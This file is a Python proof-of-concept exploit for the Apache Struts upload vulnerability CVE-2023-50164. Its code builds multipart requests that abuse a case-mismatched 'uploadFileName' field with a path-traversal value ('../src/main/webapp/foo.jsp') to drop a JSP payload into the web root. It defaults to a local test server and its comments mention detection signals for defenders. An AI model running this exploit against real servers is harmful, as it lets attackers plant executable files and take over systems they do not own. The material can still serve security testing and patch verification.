import os
import sys
import string
import random
import argparse
import requests
from urllib.parse import urlparse, urlunparse
from requests_toolbelt import MultipartEncoder
from requests.exceptions import ConnectionError
# Base name of the upload form parameter. upload_file() sends the file part
# under its capitalised form ("Upload") and, for the non-legit request, a
# companion text field named "<base>FileName".
HTTP_UPLOAD_PARAM_NAME: str = "upload"
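def upload_file(url: str, payload: str, target_path: str, proxy_servers: "dict | None", legit: bool):
    """POST the local file *payload* to *url* as a multipart/form-data upload.

    Args:
        url: Upload endpoint that receives the POST.
        payload: Local path of the file whose bytes are sent.
        target_path: Filename reported for the file part; unless ``legit``
            is set it is also sent as the extra ``uploadFileName`` field.
        proxy_servers: ``requests``-style proxies mapping, or ``None``.
        legit: When True, send only the file part; when False, add the
            companion ``uploadFileName`` field (see ``_multipart_fields``).

    Side effects:
        Prints the HTTP status code on success. On any ``requests``
        exception, prints the error and exits the process with status 1.
    """
    # Read through a context manager so the handle is closed even if read() raises
    # (the original open(...).read() left it to the garbage collector).
    with open(payload, "rb") as fh:
        file_content = fh.read()

    fields = _multipart_fields(target_path, file_content, legit)

    # Random boundary with the "----WebKitFormBoundary" prefix, as browsers emit.
    boundary = "----WebKitFormBoundary" + "".join(
        random.sample(string.ascii_letters + string.digits, 16)
    )
    encoder = MultipartEncoder(fields=fields, boundary=boundary)
    headers = {"Content-Type": encoder.content_type}

    try:
        # NOTE(security): verify=False disables TLS certificate validation. That is
        # tolerable against the local test server this script defaults to, but any
        # https:// target is reachable by a man-in-the-middle; pass a CA bundle instead
        # if the endpoint is ever remote.
        response = requests.post(url, headers=headers, data=encoder, proxies=proxy_servers, verify=False)
        print(f"Upload completed with HTTP response code {response.status_code}")
    except requests.RequestException as e:
        print("Error while uploading: ", e)
        sys.exit(1)


def _multipart_fields(target_path: str, file_content: bytes, legit: bool) -> dict:
    """Build the multipart field map for one upload request.

    The file part is always keyed by the capitalised parameter name
    (``"Upload"``). When ``legit`` is False a second, plain-text field named
    ``uploadFileName`` (lower-case prefix) carrying ``target_path`` is added;
    that mismatched-case companion field is the only difference between the
    two request shapes, so its presence in access logs, together with path
    separators in its value, is a useful detection signal for defenders.
    """
    file_part = (target_path, file_content, "application/octet-stream")
    fields = {HTTP_UPLOAD_PARAM_NAME.capitalize(): file_part}
    if not legit:
        fields[HTTP_UPLOAD_PARAM_NAME + "FileName"] = target_path
    return fields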
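if __name__ == "__main__":
    # Command-line entry point: parse options, build the optional proxy map and
    # hand everything to upload_file(). Exits with status 1 on a request error.
    parser = argparse.ArgumentParser(
        description="Upload a file to an application server using the Struts vulnerability CVE-2023-50164"
    )
    # The help text previously said "foo.upload.action"; the default is "foo/upload.action".
    parser.add_argument(
        "--url",
        default="http://localhost:9999/foo/upload.action",
        help="Endpoint URL (default after 'jetty:run': http://localhost:9999/foo/upload.action)",
    )
    parser.add_argument(
        "--payload",
        default="payload/foo.jsp",
        help="File to upload (default: payload/foo.jsp)",
    )
    parser.add_argument(
        "--target",
        default="../src/main/webapp/foo.jsp",
        help="Target path relative to the intended upload directory 'uploads' (default: ../src/main/webapp/foo.jsp)",
    )
    parser.add_argument("--proxy", default=None, help="Proxy URL (default: none)")
    parser.add_argument("--legit", action="store_true", help="Send legit request (default: False)")
    args = parser.parse_args()

    print(f"Uploading [{args.payload}] to [{args.url}], saving as [{args.target}] ...")

    # requests wants one proxy entry per scheme; route both through the same URL.
    proxy_servers = None
    if args.proxy:
        proxy_servers = {"http": args.proxy, "https": args.proxy}

    upload_file(args.url, args.payload, args.target, proxy_servers, args.legit)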